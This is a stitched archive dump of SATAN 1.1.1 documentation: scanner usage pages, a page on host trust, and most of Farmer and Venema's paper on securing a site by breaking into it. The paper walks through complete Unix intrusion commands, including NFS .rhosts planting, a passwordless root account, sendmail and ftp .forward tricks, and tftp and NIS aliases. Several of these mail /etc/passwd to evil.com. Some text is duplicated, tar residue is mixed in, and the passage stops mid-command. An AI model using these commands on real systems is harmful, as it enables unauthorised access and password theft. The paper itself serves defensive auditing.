hosts offer - anonymous FTP, WWW, etc. Gathered by examining information garnered by <I>rpcinfo</I> and by scanning TCP ports. <li>System Type. Breaks down the probed hosts by the hardware type (Sun, SGI, Ultrix, etc.); this is further subdivided by the OS version, if possible to ascertain. This is inferred by the various network banners of <I>ftp</I>, <I>telnet</I>, and <I>sendmail</I>. <li>Internet Domain. Shows the various hosts broken down into DNS domains. This is very useful when trying to understand which domains are administered well or are more important (either by sheer numbers or by examining the numbers of servers or key hosts, etc.) <li>Subnet. A subnet (as far as SATAN is concerned) is a block of up to 256 adjacent network addresses, all within the last octet of the IP address. This is the most common way of breaking up small organizations, and can be useful for showing the physical location or concentration of hosts in larger systems. <li>Host name. Allows a <STRONG>query</STRONG> of the current database of probe information about a specific host. </UL> <p> <A NAME="trust"><strong>Trust</strong></A> <p> This is a way of finding out the most important hosts on the network; the more hosts that trust a host (e.g. depend on some service, have logged in from the host, etc.), the more interesting it is to break-in from the outside, for once broken into an intruder could either break into or at least have a much better chance to break into the dependent hosts as well. <p> <A NAME="tricky-implications"><H3>Hints, Further Tricky Security Implications, or Getting the Big Picture</H3></A> It's just as important to understand what the SATAN reports <I>don't</I> show as well as what they show. It can be very comforting to see SATAN returning a clean bill of health (i.e. no vulnerabilities found), but that will often merely mean that more probing should be done. Here are some general suggestions on how to get the most out of SATAN; this requires a fairly good understanding of the <a href=satan.cf.html> config/satan.cf</a> (SATAN configuration) file: <UL> <li>Probe your own hosts from an <STRONG>EXTERNAL</STRONG> site! This is a <STRONG>necessity</STRONG> for firewalls, and a very good idea for sites in general. <li>Probe your hosts as heavily as possible, and use a high $proximity_descent value (2 or 3 are good.) <li>Use a very low $max_proximity_level - it is almost never necessary to use more than 2. However, if you're behind a firewall (e.g. have no direct IP connectivity from the host that is running the SATAN scan (Be <STRONG>VERY</STRONG> careful if you're running SATAN behind a firewall that allows inside users to have direct IP connectivity to hosts on the Internet! You are essentially on the Internet as far as SATAN is concerned), you can set this higher. There should be almost no reason to ever set this to anything beyond single digits. <li>Start with light probes and probe more heavily when you see potential danger spots. Keep tight control over what you scan - don't scan other people's hosts without permission! <li>Use the <I>$only_attack_these</I> and <I>$dont_attack_these</I> variables to control where your attacks are going. <li>Collect all of your user's <I>.rhosts</I> files and make a list of all external hosts found there. Get permission from the system administrators of those remote sites and run SATAN against <STRONG>all</STRONG> of them. <li>If you have a host that a lot of other hosts trust or have critical hosts, make sure that you scan these hosts with a "heavy" scan to help ensure that no one can gain access to these. Unless politically impossible, scan the entire subnet of these key hosts as well, because once on a subnet, it's very easy to break into other hosts on the same subnet. </UL> <p> <A NAME="command-line"><H3>The Command-line Interface</H3></A> For those without a good HTML browser, for those die-hard Un*x types that despise GUI's, or for simply firing off probes when you don't want to leave a several megabyte memory hog (your HTML viewer) doing essentially nothing, all of the probing functionality is accessible from your favorite Un*x shell prompt. However, you <STRONG>cannot</STRONG> examine the reports, do queries, or any of a number of other nifty things by simply using the command line. This is because the reporting programs were written to emit HTML code, and even the two hard-core Un*x hackers who wrote this program love (and hate, we must admit) what HTML can do. <p> Here are the command line options, what they do, and what SATAN variables they correspond to. Further explanations of the variables that are mentioned here can be found in the <a href=satan.cf.html> config/satan.cf</a> (SATAN configuration) file. <p> SATAN enters interactive mode when no target host is specified. <p> <dl compact> <DT>-a <dd> Attack level (0=light, 1=normal, 2=heavy). Variable: <i>$attack_level</i>. <p><dt>-c 'name = value; name = value...' <dd> Change SATAN variables. Use this to overrule configuration variables that do not have their own command-line option. <p><dt>-d <dd> SATAN database to read already collected data from, and to save new data to. Variable: <i>$satan_data</i>. <p><dt>-i <dd> Ignore already collected data. <p><dt>-l <dd> Maximal proximity level. Variable: <i>$max_proximity_level</i>. <p><dt>-o list <dd> Scan only these hosts, domains or networks. Variable: <i>$only_attack_these</i>. <p><dt>-O list <dd> Don't scan these hosts, domains or networks. Variable: <i>$dont_attack_these</i>. <p><dt>-s <dd> Enable subnet expansions. Variable: <i>$attack_proximate_subnets</i>. <p><dt>-S status_file <dd> SATAN status file (default <i>status_file</i>). Variable: <i>$status_file</i>. <p><dt>-t level <dd> Timeout length (0 = short, 1 = medium, 2 = long). Variable: <i>$timeout</i>. <p><dt>-v <dd> Turn on debugging output (to stdout). Variable: <i>$debug</i>. <p><dt>-V <dd> Print version number and terminate. <p><dt>-z <dd> Continue with attack level of zero when the level would become negative. The scan continues until the maximal proximity level is reached. <p><dt>-Z <dd> Opposite of the <i>-z</i> option. </dl> <p> <hr> <a href="satan_reference.html"> Back to the Reference TOC/Index</a> </BODY> </HTML> <STRONG>necessity</STRONG> for firewalls, and a very good idea for sites in general. <li>Probe your hosts as heavily as possible, and use a high $proximity_descent value (2 or 3 are good.) <li>Use a very low $max_satan-1.1.1/html/docs/trust.html.................................................................... 600 . 465 . 506 . 5365 5737562557 11672. ............................................................................. ................................................................................................................................................................................................................................................................. ......................<HTML> <HEAD> <title>TRUST</title> <LINK REV="made" HREF="mailto:satan@fish.com"> </HEAD> <BODY> <H1><IMG SRC="../images/satan.gif" ALT="[SATAN IMAGE]">Trust</H1> <HR> Trust is one of the most, if not the most, important concepts in SATAN. The issues and implications of trust are a bit more subtle and far-reaching than what we've covered before; in the context of this documentation we use the word trust whenever there is a situation when a server (note that any host that allows any remote access can be called a server) can have a local resource either used or compromised by a client with or without the proper authorization. In addition, trust is transitive; e.g. if host <i>B</i> trusts host <i>A</i>, and an intruder can compromise host <i>A</i>, then the intruder can also compromise host <i>B</i>. <p> There are many ways that a host can trust: .rhosts and hosts.equiv files that allow access without password verification are the most common, but other examples are window servers that allow remote systems to use and abuse privileges; export files that control access via NFS, etc. However (and this is the most controversial statement about trust), we also say that if a host has had <strong>login</strong> accesses from another host, that the former host trusts the latter. The reason for this is that unless extra authentication is being used, if a user logs in from a compromised remote host then the attacker can steal the password and data streams from the legitimate user and can almost compromise the host in question. <p> Although the concept of how host trust works is well understood by most system administrators, the <strong>dangers</strong> of trust, and the <strong>practical</strong> problem it represents, irrespective of trickier attacks such as hostname impersonation and IP spoofing, is one of the least understood problems we know of on the Internet. This goes far beyond the obvious hosts.equiv and rhosts files; NFS, NIS, windowing systems -- indeed, much of the useful services in UNIX are based on the concept that well known (to an administrator or user) sites are trusted in some way. What is not understood is how networking so tightly binds security between what are normally considered disjoint hosts. <p> <strong>Any</strong> form of trust can be spoofed, fooled, or subverted, especially when the authority that gets queried to check the credentials of the client is either outside of the server's administrative domain, when the trust mechanism is based on something that has a weak form of authentication, or if the security of the other system involved is outside of the direct control of the system administrator. One or more of these are usually true. <hr> <a href="satan_overview.html"> Back to the Introductory TOC/Index</a> </BODY> </HTML> in the <a href=satan.cf.html> config/satan.cf</a> (SATAN configuration) file. <p> SATAN enters interactive mode when no target host is specified. <p> <dl compact> <DT>-a <dd> Attack level (0=light, 1=normal, 2=heavy). Variable: <i>$attack_level</i>. <p><dt>-c 'namesatan-1.1.1/html/docs/admin_guide_to_cracking.html.................................................. 600 . 465 . 506 . 146450 5737222604 15344. ...................................................................................... ................................................................................................................................................................................................................................................................. .............<HTML> <HEAD> <title>Improving the Security of Your Site by Breaking Into it</title> <LINK REV="made" HREF="mailto:satan@fish.com"> </HEAD> <BODY> <IMG SRC="../images/satan.gif" ALT="[SATAN IMAGE]"> <H2>Improving the Security of Your Site by Breaking Into it</H2> <HR> <p> <pre> Dan Farmer Wietse Venema Vicious Fishes Eindhoven University of Technology 1685 Oak Street, #202 P.O. Box 513, 5600 MB San Francisco, CA 94117 Eindhoven, NL zen@fish.com wietse@wzv.win.tue.nl Introduction ------------ Every day, all over the world, computer networks and hosts are being broken into. The level of sophistication of these attacks varies widely; while it is generally believed that most break-ins succeed due to weak passwords, there are still a large number of intrusions that use more advanced techniques to break in. Less is known about the latter types of break-ins, because by their very nature they are much harder to detect. ----- CERT. SRI. The Nic. NCSC. RSA. NASA. MIT. Uunet. Berkeley. Purdue. Sun. You name it, we've seen it broken into. Anything that is on the Internet (and many that isn't) seems to be fairly easy game. Are these targets unusual? What happened? Fade to... A young boy, with greasy blonde hair, sitting in a dark room. The room is illuminated only by the luminescense of the C64's 40 character screen. Taking another long drag from his Benson and Hedges cigarette, the weary system cracker telnets to the next faceless ".mil" site on his hit list. "guest -- guest", "root -- root", and "system -- manager" all fail. No matter. He has all night... he pencils the host off of his list, and tiredly types in the next potential victim... This seems to be the popular image of a system cracker. Young, inexperienced, and possessing vast quantities of time to waste, to get into just one more system. However, there is a far more dangerous type of system cracker out there. One who knows the ins and outs of the latest security auditing and cracking tools, who can modify them for specific attacks, and who can write his/her own programs. One who not only reads about the latest security holes, but also personally discovers bugs and vulnerabilities. A deadly creature that can both strike poisonously and hide its tracks without a whisper or hint of a trail. The uebercracker is here. ----- Why "uebercracker"? The idea is stolen, obviously, from Nietzsche's uebermensch, or, literally translated into English, "over man." Nietzsche used the term not to refer to a comic book superman, but instead a man who had gone beyond the incompetence, pettiness, and weakness of the everyday man. The uebercracker is therefore the system cracker who has gone beyond simple cookbook methods of breaking into systems. An uebercracker is not usually motivated to perform random acts of violence. Targets are not arbitrary -- there is a purpose, whether it be personal monetary gain, a hit and run raid for information, or a challenge to strike a major or prestigious site or net.personality. An uebercracker is hard to detect, harder to stop, and hardest to keep out of your site for good. Overview -------- In this paper we will take an unusual approach to system security. Instead of merely saying that something is a problem, we will look through the eyes of a potential intruder, and show _why_ it is one. We will illustrate that even seemingly harmless network services can become valuable tools in the search for weak points of a system, even when these services are operating exactly as they are intended to. In an effort to shed some light on how more advanced intrusions occur, this paper outlines various mechanisms that crackers have actually used to obtain access to systems and, in addition, some techniques we either suspect intruders of using, or that we have used ourselves in tests or in friendly/authorized environments. Our motivation for writing this paper is that system administrators are often unaware of the dangers presented by anything beyond the most trivial attacks. While it is widely known that the proper level of protection depends on what has to be protected, many sites appear to lack the resources to assess what level of host and network security is adequate. By showing what intruders can do to gain access to a remote site, we are trying to help system administrators to make _informed_ decisions on how to secure their site -- or not. We will limit the discussion to techniques that can give a remote intruder access to a (possibly non-interactive) shell process on a UNIX host. Once this is achieved, the details of obtaining root privilege are beyond the scope of this work -- we consider them too site-dependent and, in many cases, too trivial to merit much discussion. We want to stress that we will not merely run down a list of bugs or security holes -- there will always be new ones for a potential attacker to exploit. The purpose of this paper is to try to get the reader to look at her or his system in a new way -- one that will hopefully afford him or her the opportunity to _understand_ how their system can be compromised, and how. We would also like to reiterate to the reader that the purpose of this paper is to show you how to test the security of your own site, not how to break into other people's systems. The intrusion techniques we illustrate here will often leave traces in your system auditing logs -- it might be constructive to examine them after trying some of these attacks out, to see what a real attack might look like. Certainly other sites and system administrators will take a very dim view of your activities if you decide to use their hosts for security testing without advance authorization; indeed, it is quite possible that legal action may be pursued against you if they perceive it as an attack. There are four main parts to the paper. The first part is the introduction and overview. The second part attempts to give the reader a feel for what it is like to be an intruder and how to go from knowing nothing about a system to compromising its security. This section goes over actual techniques to gain information and entrance and covers basic strategies such as exploiting trust and abusing improperly configured basic network services (ftp, mail, tftp, etc.) It also discusses slightly more advanced topics, such as NIS and NFS, as well as various common bugs and configuration problems that are somewhat more OS or system specific. Defensive strategies against each of the various attacks are also covered here. The third section deals with trust: how the security of one system depends on the integrity of other systems. Trust is the most complex subject in this paper, and for the sake of brevity we will limit the discussion to clients in disguise. The fourth section covers the basic steps that a system administrator may take to protect her or his system. Most of the methods presented here are merely common sense, but they are often ignored in practice -- one of our goals is to show just how dangerous it can be to ignore basic security practices. Case studies, pointers to security-related information, and software are described in the appendices at the end of the paper. While exploring the methods and strategies discussed in this paper we we wrote SATAN (Security Analysis Tool for Auditing Networks.) Written in shell, perl, expect and C, it examines a remote host or set of hosts and gathers as much information as possible by remotely probing NIS, finger, NFS, ftp and tftp, rexd, and other services. This information includes the presence of various network information services as well as potential security flaws -- usually in the form of incorrectly setup or configured network services, well-known bugs in system or network utilities, or poor or ignorant policy decisions. It then can either report on this data or use an expert system to further investigate any potential security problems. While SATAN doesn't use all of the methods that we discuss in the paper, it has succeeded with ominous regularity in finding serious holes in the security of Internet sites. It will be posted and made available via anonymous ftp when completed; Appendix A covers its salient features. Note that it isn't possible to cover all possible methods of breaking into systems in a single paper. Indeed, we won't cover two of the most effective methods of breaking into hosts: social engineering and password cracking. The latter method is so effective, however, that several of the strategies presented here are geared towards acquiring password files. In addition, while windowing systems (X, OpenWindows, etc.) can provide a fertile ground for exploitation, we simply don't know many methods that are used to break into remote systems. Many system crackers use non-bitmapped terminals which can prevent them from using some of the more interesting methods to exploit windowing systems effectively (although being able to monitor the victim's keyboard is often sufficient to capture passwords). Finally, while worms, viruses, trojan horses, and other malware are very interesting, they are not common (on UNIX systems) and probably will use similar techniques to the ones we describe in this paper as individual parts to their attack strategy. Gaining Information ------------------- Let us assume that you are the head system administrator of Victim Incorporated's network of UNIX workstations. In an effort to secure your machines, you ask a friendly system administrator from a nearby site (evil.com) to give you an account on one of her machines so that you can look at your own system's security from the outside. What should you do? First, try to gather information about your (target) host. There is a wealth of network services to look at: finger, showmount, and rpcinfo are good starting points. But don't stop there -- you should also utilize DNS, whois, sendmail (smtp), ftp, uucp, and as many other services as you can find. There are so many methods and techniques that space precludes us from showing all of them, but we will try to show a cross-section of the most common and/or dangerous strategies that we have seen or have thought of. Ideally, you would gather such information about all hosts on the subnet or area of attack -- information is power -- but for now we'll examine only our intended target. To start out, you look at what the ubiquitous finger command shows you (assume it is 6pm, Nov 6, 1993): victim % finger @victim.com [victim.com] Login Name TTY Idle When Where zen Dr. Fubar co 1d Wed 08:00 death.com Good! A single idle user -- it is likely that no one will notice if you actually manage to break in. Now you try more tactics. As every finger devotee knows, fingering "@", "0", and "", as well as common names, such as root, bin, ftp, system, guest, demo, manager, etc., can reveal interesting information. What that information is depends on the version of finger that your target is running, but the most notable are account names, along with their home directories and the host that they last logged in from. To add to this information, you can use rusers (in particular with the -l flag) to get useful information on logged-in users. Trying these commands on victim.com reveals the following information, presented in a compressed tabular form to save space: Login Home-dir Shell Last login, from where ----- -------- ----- ---------------------- root / /bin/sh Fri Nov 5 07:42 on ttyp1 from big.victim.com bin /bin Never logged in nobody / Tue Jun 15 08:57 on ttyp2 from server.victim.co daemon / Tue Mar 23 12:14 on ttyp0 from big.victim.com sync / /bin/sync Tue Mar 23 12:14 on ttyp0 from big.victim.com zen /home/zen /bin/bash On since Wed Nov 6 on ttyp3 from death.com sam /home/sam /bin/csh Wed Nov 5 05:33 on ttyp3 from evil.com guest /export/foo /bin/sh Never logged in ftp /home/ftp Never logged in Both our experiments with SATAN and watching system crackers at work have proved to us that finger is one of the most dangerous services, because it is so useful for investigating a potential target. However, much of this information is useful only when used in conjunction with other data. </pre> <a name="unrestricted-NFS-export"> <pre> For instance, running showmount on your target reveals: evil % showmount -e victim.com export list for victim.com: /export (everyone) /var (everyone) /usr easy /export/exec/kvm/sun4c.sunos.4.1.3 easy /export/root/easy easy /export/swap/easy easy Note that /export/foo is exported to the world; also note that this is user guest's home directory. Time for your first break-in! In this case, you'll mount the home directory of user "guest." Since you don't have a corresponding account on the local machine and since root cannot modify files on an NFS mounted filesystem, you create a "guest" account in your local password file. As user guest you can put an .rhosts entry in the remote guest home directory, which will allow you to login to the target machine without having to supply a password. evil # mount victim.com:/export/foo /foo evil # cd /foo evil # ls -lag total 3 1 drwxr-xr-x 11 root daemon 512 Jun 19 09:47 . 1 drwxr-xr-x 7 root wheel 512 Jul 19 1991 .. 1 drwx--x--x 9 10001 daemon 1024 Aug 3 15:49 guest evil # echo guest:x:10001:1:temporary breakin account:/: >> /etc/passwd evil # ls -lag total 3 1 drwxr-xr-x 11 root daemon 512 Jun 19 09:47 . 1 drwxr-xr-x 7 root wheel 512 Jul 19 1991 .. 1 drwx--x--x 9 guest daemon 1024 Aug 3 15:49 guest evil # su guest evil % echo evil.com >> guest/.rhosts evil % rlogin victim.com . Welcome to victim.com! victim % If, instead of home directories, victim.com were exporting filesystems with user commands (say, /usr or /usr/local/bin), you could replace a command with a trojan horse that executes any command of your choice. The next user to execute that command would execute your program. We suggest that filesystems be exported: o Read/write only to specific, trusted clients. o Read-only, where possible (data or programs can often be exported in this manner.) </pre> <a name="remote-shell-access"> <pre> If the target has a "+" wildcard in its /etc/hosts.equiv (the default in various vendor's machines) or has the netgroups bug (CERT advisory 91:12), any non-root user with a login name in the target's password file can rlogin to the target without a password. And since the user "bin" often owns key files and directories, your next attack is to try to log in to the target host and modify the password file to let you have root access: evil % whoami bin evil % rsh victim.com csh -i Warning: no access to tty; thus no job control in this shell... victim % ls -ldg /etc drwxr-sr-x 8 bin staff 2048 Jul 24 18:02 /etc victim % cd /etc victim % mv passwd pw.old victim % (echo toor::0:1:instant root shell:/:/bin/sh; cat pw.old ) > passwd victim % ^D evil % rlogin victim.com -l toor . Welcome to victim.com! victim # A few notes about the method used above; "rsh victim.com csh -i" is used to initially get onto the system because it doesn't leave any traces in the wtmp or utmp system auditing files, making the rsh invisible for finger and who. The remote shell isn't attached to a pseudo-terminal, however, so that screen-oriented programs such as pagers and editors will fail -- but it is very handy for brief exploration. The COPS security auditing tool (see appendix D) will report key files or directories that are writable to accounts other than the superuser. If you run SunOS 4.x you can apply patch 100103 to fix most file permission problems. On many systems, rsh probes as shown above, even when successful, would remain completely unnoticed; the tcp wrapper (appendix D), which logs incoming connections, can help to expose such activities. ---- </pre> <a name="writable-ftp"> <pre> What now? Have you uncovered all the holes on your target system? Not by a long shot. Going back to the finger results on your target, you notice that it has an "ftp" account, which usually means that anonymous ftp is enabled. Anonymous ftp can be an easy way to get access, as it is often misconfigured. For example, the target may have a complete copy of the /etc/passwd file in the anonymous ftp ~ftp/etc directory instead of a stripped down version. In this example, thfinger ough, you see that the latter doesn't seem to be true (how can you tell without actually examining the file?) However, the home directory of ftp on victim.com is writable. This allows you to remotely execute a command -- in this case, mailing the password file back to yourself -- by the simple method of creating a .forward file that executes a command when mail is sent to the ftp account. This is the same mechanism of piping mail to a program that the "vacation" program uses to automatically reply to mail messages. evil % cat forward_sucker_file "|/bin/mail zen@evil.com < /etc/passwd" evil % ftp victim.com Connected to victim.com 220 victim FTP server ready. Name (victim.com:zen): ftp 331 Guest login ok, send ident as password. Password: 230 Guest login ok, access restrictions apply. ftp> ls -lga 200 PORT command successful. 150 ASCII data connection for /bin/ls (192.192.192.1,1129) (0 bytes). total 5 drwxr-xr-x 4 101 1 512 Jun 20 1991 . drwxr-xr-x 4 101 1 512 Jun 20 1991 .. drwxr-xr-x 2 0 1 512 Jun 20 1991 bin drwxr-xr-x 2 0 1 512 Jun 20 1991 etc drwxr-xr-x 3 101 1 512 Aug 22 1991 pub 226 ASCII Transfer complete. 242 bytes received in 0.066 seconds (3.6 Kbytes/s) ftp> put forward_sucker_file .forward 43 bytes sent in 0.0015 seconds (28 Kbytes/s) ftp> quit evil % echo test | mail ftp@victim.com Now you simply wait for the password file to be sent back to you. The security auditing tool COPS will check your anonymous ftp setup; see the man page for ftpd, the documentation/code for COPS, or CERT advisory 93:10 for information on how to set up anonymous ftp correctly. Vulnerabilities in ftp are often a matter of incorrect ownership or permissions of key files or directories. At the very least, make sure that ~ftp and all "system" directories and files below ~ftp are owned by root and are not writable by any user. While looking at ftp, you can check for an older bug that was once widely exploited: % ftp -n ftp> open victim.com Connected to victim.com 220 victim.com FTP server ready. ftp> quote user ftp 331 Guest login ok, send ident as password. ftp> quote cwd ~root 530 Please login with USER and PASS. ftp> quote pass ftp 230 Guest login ok, access restrictions apply. ftp> ls -al / (or whatever) If this works, you now are logged in as root, and able to modify the password file, or whatever you desire. If your system exhibits this bug, you should definitely get an update to your ftpd daemon, either from your vendor or (via anon ftp) from ftp.uu.net. The wuarchive ftpd, a popular replacement ftp daemon put out by the Washington University in Saint Louis, had almost the same problem. If your wuarchive ftpd pre-dates April 8, 1993, you should replace it by a more recent version. </pre> <a name="tftp"> <pre> Finally, there is a program vaguely similar to ftp -- tftp, or the trivial file transfer program. This daemon doesn't require any password for authentication; if a host provides tftp without restricting the access (usually via some secure flag set in the inetd.conf file), an attacker can read and write files anywhere on the system. In the example, you get the remote password file and place it in your local /tmp directory: evil % tftp tftp> connect victim.com tftp> get /etc/passwd /tmp/passwd.victim tftp> quit For security's sake, tftp should not be run; if tftp is necessary, use the secure option/flag to restrict access to a directory that has no valuable information, or run it under the control of a chroot wrapper program. ---- If none of the previous methods have worked, it is time to go on to more drastic measures. You have a friend in rpcinfo, another very handy program, sometimes even more useful than finger. Many hosts run RPC services that can be exploited; rpcinfo can talk to the portmapper and show you the way. It can tell you if the host is running NIS, if it is a NIS server or slave, if a diskless workstation is around, if it is running NFS, any of the info services (rusersd, rstatd, etc.), or any other unusual programs (auditing or security related). For instance, going back to our sample target: evil % rpcinfo -p victim.com [output trimmed for brevity's sake] program vers proto port 100004 2 tcp 673 ypserv 100005 1 udp 721 mountd 100003 2 udp 2049 nfs 100026 1 udp 733 bootparam 100017 1 tcp 1274 rexd </pre> <a name="nis-passwords"> <pre> In this case, you can see several significant facts about our target; first of which is that it is an NIS server. It is perhaps not widely known, but once you know the NIS domainname of a server, you can get any of its NIS maps by a simple rpc query, even when you are outside the subnet served by the NIS server (for example, using the YPX program that can be found in the comp.sources.misc archives on ftp.uu.net). In addition, very much like easily guessed passwords, many systems use easily guessed NIS domainnames. Trying to guess the NIS domainname is often very fruitful. Good candidates are the fully and partially qualified hostname (e.g. "victim" and "victim.com"), the organization name, netgroup names in "showmount" output, and so on. If you wanted to guess that the domainname was "victim", you could type: evil % ypwhich -d victim victim.com Domain victim not bound. This was an unsuccessful attempt; if you had guessed correctly it would have returned with the host name of victim.com's NIS server. However, note from the NFS section that victim.com is exporting the "/var" directory to the world. All that is needed is to mount this directory and look in the "yp" subdirectory -- among other things you will see another subdirectory that contains the domainname of the target. evil # mount victim.com:/var /foo evil # cd /foo evil # /bin/ls -alg /foo/yp total 17 1 drwxr-sr-x 4 root staff 512 Jul 12 14:22 . 1 drwxr-sr-x 11 root staff 512 Jun 29 10:54 .. 11 -rwxr-xr-x 1 root staff 10993 Apr 22 11:56 Makefile 1 drwxr-sr-x 2 root staff 512 Apr 22 11:20 binding 2 drwxr-sr-x 2 root staff 1536 Jul 12 14:22 foo_bar [...] In this case, "foo_bar" is the NIS domain name. In addition, the NIS maps often contain a good list of user/employee names as well as internal host lists, not to mention passwords for cracking. Appendix C details the results of a case study on NIS password files. ---- </pre> <a name="rexd"> <pre> You note that the rpcinfo output also showed that victim.com runs rexd. Like the rsh daemon, rexd processes requests of the form "please execute this command as that user". Unlike rshd, however, rexd does not care if the client host is in the hosts.equiv or .rhost files. Normally the rexd client program is the "on" command, but it only takes a short C program to send arbitrary client host and userid information to the rexd server; rexd will happily execute the command. For these reasons, running rexd is similar to having no passwords at all: all security is in the client, not in the server where it should be. Rexd security can be improved somewhat by using secure RPC. ---- While looking at the output from rpcinfo, you observe that victim.com also seems to be a server for diskless workstations. This is evidenced by the presence of the bootparam service, which provides information to the diskless clients for booting. If you ask nicely, using BOOTPARAMPROC_WHOAMI and provide the address of a client, you can get its NIS domainname. This can be very useful when combined with the fact that you can get arbitrary NIS maps (such as the password file) when you know the NIS domainname. Here is a sample code snippet to do just that (bootparam is part of SATAN.) char *server; struct bp_whoami_arg arg; /* query */ struct bp_whoami_res res; /* reply */ /* initializations omitted... */ callrpc(server, BOOTPARAMPROG, BOOTPARAMVERS, BOOTPARAMPROC_WHOAMI, xdr_bp_whoami_arg, &arg, xdr_bp_whoami_res, &res); printf("%s has nisdomain %s\n", server, res.domain_name); The showmount output indicated that "easy" is a diskless client of victim.com, so we use its client address in the BOOTPARAMPROC_WHOAMI query: evil % bootparam victim.com easy.victim.com victim.com has nisdomain foo_bar ---- NIS masters control the mail aliases for the NIS domain in question. Just like local mail alias files, you can create a mail alias that will execute commands when mail is sent to it (a once popular example of this is the "decode" alias which uudecodes mail files sent to it.) For instance, here you create an alias "foo", which mails the password file back to evil.com by simply mailing any message to it: nis-master # echo 'foo: "| mail zen@evil.com < /etc/passwd "' >> /etc/aliases nis-master # cd /var/yp nis-master # make aliases nis-master # echo test | mail -v foo@victim.com Hopefully attackers won't have control of your NIS master host, but even more hopefully the lesson is clear -- NIS is normally insecure, but if an attacker has control of your NIS master, then s/he effectively has control of the client hosts (e.g. can execute arbitrary commands). There aren't many effective defenses against NIS attacks; it is an insecure service that has almost no authentication between clients and servers. To make things worse, it seems fairly clear that arbitrary maps can be forced onto even master servers (e.g., it is possible to treat an NIS server as a client). This, obviously, would subvert the entire schema. If it is absolutely necessary to use NIS, choosing a hard to guess domainname can help slightly, but if you run diskless clients that are exposed to potential attackers then it is trivial for an attacker to defeat this simple step by using the bootparam trick to get the domainname. If NIS is used to propagate the password maps, then shadow passwords do not give additional protection because the shadow map is still accessible to any attacker that has root on an attacking host. Better is to use NIS as little as possible, or to at least realize that the maps can be subject to perusal by potentially hostile forces. Secure RPC goes a long way to diminish the threat, but it has its own problems, primarily in that it is difficult to administer, but also in that the cryptographic methods used within are not very strong. It has been rumored that NIS+, Sun's new network information service, fixes some of these problems, but until now it has been limited to running on Suns, and thus far has not lived up to the promise of the design. Finally, using packet filtering (at the very least port 111) or securelib (see appendix D), or, for Suns, applying Sun patch 100482-02 all can help. ---- </pre> <a name="x-access"> <pre> The portmapper only knows about RPC services. Other network services can be located with a brute-force method that connects to all network ports. Many network utilities and windowing systems listen to specific ports (e.g. sendmail is on port 25, telnet is on port 23, X windows is usually on port 6000, etc.) SATAN includes a program that scans the ports of a remote hosts and reports on its findings; if you run it against our target, you see: evil % tcpmap victim.com Mapping 128.128.128.1 port 21: ftp port 23: telnet port 25: smtp port 37: time port 79: finger port 512: exec port 513: login port 514: shell port 515: printer port 6000: (X) This suggests that victim.com is running X windows. If not protected properly (via the magic cookie or xhost mechanisms), window displays can be captured or watched, user keystrokes may be stolen, programs executed remotely, etc. Also, if the target is running X and accepts a telnet to port 6000, that can be used for a denial of service attack, as the target's windowing system will often "freeze up" for a short period of time. One method to determine the vulnerability of an X server is to connect to it via the XOpenDisplay() function; if the function returns NULL then you cannot access the victim's display (opendisplay is part of SATAN): char *hostname; if (XOpenDisplay(hostname) == NULL) { printf("Cannot open display: %s\n", hostname); } else { printf("Can open display: %s\n", hostname); } evil % opendisplay victim.com:0 Cannot open display: victim.com:0 X terminals, though much less powerful than a complete UNIX system, can have their own security problems. Many X terminals permit unrestricted rsh access, allowing you to start X client programs in the victim's terminal with the output appearing on your own screen: evil % xhost +xvictim.victim.com evil % rsh xvictim.victim.com telnet victim.com -display evil.com In any case, give as much thought to your window security as your filesystem and network utilities, for it can compromise your system as surely as a "+" in your hosts.equiv or a passwordless (root) account. ---- </pre> <a name="sendmail"> <pre> Next, you examine sendmail. Sendmail is a very complex program that has a long history of security problems, including the infamous "wiz" command (hopefully long since disabled on all machines). You can often determine the OS, sometimes down to the version number, of the target, by looking at the version number returned by sendmail. This, in turn, can give you hints as to how vulnerable it might be to any of the numerous bugs. In addition, you can see if they run the "decode" alias, which has its own set of problems: evil % telnet victim.com 25 connecting to host victim.com (128.128.128.1.), port 25 connection open 220 victim.com Sendmail Sendmail 5.55/victim ready at Fri, 6 Nov 93 18:00 PDT expn decode 250 <"|/usr/bin/uudecode"> quit Running the "decode" alias is a security risk -- it allows potential attackers to overwrite any file that is writable by the owner of that alias -- often daemon, but potentially any user. Consider this piece of mail -- this will place "evil.com" in user zen's .rhosts file if it is writable: evil % echo "evil.com" | uuencode /home/zen/.rhosts | mail decode@victim.com If no home directories are known or writable, an interesting variation of this is to create a bogus /etc/aliases.pag file that contains an alias with a command you wish to execute on your target. This may work since on many systems the aliases.pag and aliases.dir files, which control the system's mail aliases, are writable to the world. evil % cat decode bin: "| cat /etc/passwd | mail zen@evil.com" evil % newaliases -oQ/tmp -oA`pwd`/decode evil % uuencode decode.pag /etc/aliases.pag | mail decode@victom.com evil % /usr/lib/sendmail -fbin -om -oi bin@victim.com < /dev/null A lot of things can be found out by just asking sendmail if an address is acceptable (vrfy), or what an address expands to (expn). When the finger or rusers services are turned off, vrfy and expn can still be used to identify user accounts or targets. Vrfy and expn can also be used to find out if the user is piping mail through any program that might be exploited (e.g. vacation, mail sorters, etc.). It can be a good idea to disable the vrfy and expn commands: in most versions, look at the source file srvrsmtp.c, and either delete or change the two lines in the CmdTab structure that have the strings "vrfy" and "expn". Sites without source can still disable expn and vrfy by just editing the sendmail executable with a binary editor and replacing "vrfy" and "expn" with blanks. Acquiring a recent version of sendmail (see Appendix D) is also an extremely good idea, since there have probably been more security bugs reported in sendmail than in any other UNIX program. ---- As a sendmail-sendoff, there are two fairly well known bugs that should be checked into. The first was definitely fixed in version 5.59 from Berkeley; despite the messages below, for versions of sendmail previous to 5.59, the "evil.com" gets appended, despite the error messages, along with all of the typical mail headers, to the file specified: % cat evil_sendmail telnet victim.com 25 << EOSM rcpt to: /home/zen/.rhosts mail from: zen data random garbage . rcpt to: /home/zen/.rhosts mail from: zen data evil.com . quit EOSM evil % /bin/sh evil_sendmail Trying 128.128.128.1 Connected to victim.com Escape character is '^]'. Connection closed by foreign host. evil % rlogin victim.com -l zen . Welcome to victim.com! victim % The second hole, fixed only recently, permitted anyone to specify arbitrary shell commands and/or pathnames for the sender and/or destination address. Attempts to keep details secret were in vain, and extensive discussions in mailing lists and usenet news groups led to disclosure of how to exploit some versions of the bug. As with many UNIX bugs, nearly every vendor's sendmail was vulnerable to the problem, since they all share a common source code tree ancestry. Space precludes us from discussing it fully, but a typical attack to get the password file might look like this: evil % telnet victim.com 25 Trying 128.128.128.1... Connected to victim.com Escape character is '^]'. 220 victim.com Sendmail 5.55 ready at Saturday, 6 Nov 93 18:04 mail from: "|/bin/mail zen@evil.com < /etc/passwd" 250 "|/bin/mail zen@evil.com < 